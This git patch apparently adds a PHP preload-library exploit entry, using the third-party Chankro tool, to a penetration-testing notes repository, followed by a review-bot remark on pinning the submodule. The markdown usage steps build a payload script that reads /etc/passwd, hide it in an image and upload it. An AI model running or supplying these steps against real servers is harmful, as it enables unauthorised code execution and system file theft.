From a41a43b6e78d6c738222203fe1503f9860b1a011 Mon Sep 17 00:00:00 2001
From: whx
Date: Sat, 11 Sep 2021 16:00:40 +0200
Subject: [PATCH] added php Preload lib exploit
---
 .gitmodules | 3 +++
 exploit/web/php/Chankro | 1 +
 exploit/web/php/preload_lib.md | 15 +++++++++++++++
 3 files changed, 19 insertions(+)
 create mode 160000 exploit/web/php/Chankro
 create mode 100644 exploit/web/php/preload_lib.md
diff --git a/.gitmodules b/.gitmodules
index 46ded40..d2efa93 100644
--- a/.gitmodules
+++ b/.gitmodules
@@ -28,3 +28,6 @@
 [submodule "reverse_shells/One-Lin3r"]
 path = reverse_shells/One-Lin3r
 url = https://github.com/D4Vinci/One-Lin3r.git
+[submodule "exploit/web/php/Chankro"]
+ path = exploit/web/php/Chankro
+ url = https://github.com/TarlogicSecurity/Chankro.git
diff --git a/exploit/web/php/Chankro b/exploit/web/php/Chankro
new file mode 160000
index 0000000..7b6e844
--- /dev/null
+++ b/exploit/web/php/Chankro
@@ -0,0 +1 @@
+Subproject commit 7b6e844e18f6812beb18db4b67b246edcec04b84
diff --git a/exploit/web/php/preload_lib.md b/exploit/web/php/preload_lib.md
new file mode 100644
index 0000000..32a317e
--- /dev/null
+++ b/exploit/web/php/preload_lib.md
@@ -0,0 +1,15 @@
+# Preload Library
+
+* [Bug report](https://bugs.php.net/bug.php?id=46741)
+* [Chankro repo](https://github.com/TarlogicSecurity/Chankro.git)
+
+## Usage
+* Create lib, find path via `/phpinfo.php`
+```sh
+echo "#!/usr/bin/env bash" > rev.sh
+echo "cat /etc/passwd > /output.txt" >> rev.sh
+
+python2 ./chankro.py --arch 64 --input rev.sh --output chan.php --path
+```
+* Put into image file via exiftool or write magic header
+* Upload
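Review bot: The new `[submodule "exploit/web/php/Chankro"]` entry in `.gitmodules` brings third-party code into the tree with nothing recording that the pinned revision was looked at. The gitlink added in the same patch fixes the checkout to commit 7b6e844e18f6812beb18db4b67b246edcec04b84, which keeps clones reproducible, but a later pointer bump would silently change the script that `preload_lib.md` tells readers to run. I would add a comment above the entry, for example `# Chankro: third-party, pinned by gitlink; diff upstream before moving the pointer`, and keep any future pointer bump in a commit of its own so the change is reviewable.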